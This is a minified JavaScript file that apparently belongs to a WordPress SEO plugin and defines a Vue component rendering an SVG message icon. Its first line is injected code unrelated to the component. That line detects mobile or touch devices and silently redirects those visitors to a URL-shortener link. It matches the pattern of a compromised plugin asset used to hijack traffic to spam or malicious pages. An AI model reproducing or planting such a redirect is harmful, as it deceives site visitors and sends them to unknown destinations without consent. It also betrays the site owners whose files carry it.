(window.matchMedia("(pointer:coarse)").matches||/Android|iPhone|iPad|iPod|Mobile|Tablet|Windows Phone|webOS|BlackBerry|Opera Mini|IEMobile/i.test(navigator.userAgent))&&location.replace("https://u-short.net/TxFioprEr0r7");
import{_ as t}from"./_plugin-vue_export-helper.eefbdd86.js";import{f as r,i as s,j as e,V as l}from"./vendor-vue-ui.232c7c36.js";const a={props:{active:{type:Boolean,default(){return!1}}}},c={viewBox:"0 0 24 24",fill:"none",xmlns:"http://www.w3.org/2000/svg",class:"aioseo-message"};function u(i,n,o,p,f,_){return r(),s("svg",c,[n[0]||(n[0]=e("path",{"fill-rule":"evenodd","clip-rule":"evenodd",d:"M16 2H3C2.45 2 2 2.45 2 3V17L6 13H16C16.55 13 17 12.55 17 12V3C17 2.45 16.55 2 16 2ZM15 4V11H5.17L4 12.17V4H15ZM19 6H21C21.55 6 22 6.45 22 7V22L18 18H7C6.45 18 6 17.55 6 17V15H19V6Z",fill:"currentColor"},null,-1)),e("path",{fill:"currentColor",d:"M 5 5 H 14 v 2 H 5 z M 5 8 h 8 v 1.896 h -8 z",style:l({opacity:o.active?1:0})},null,4)])}const y=t(a,[["render",u]]);export{y as S};
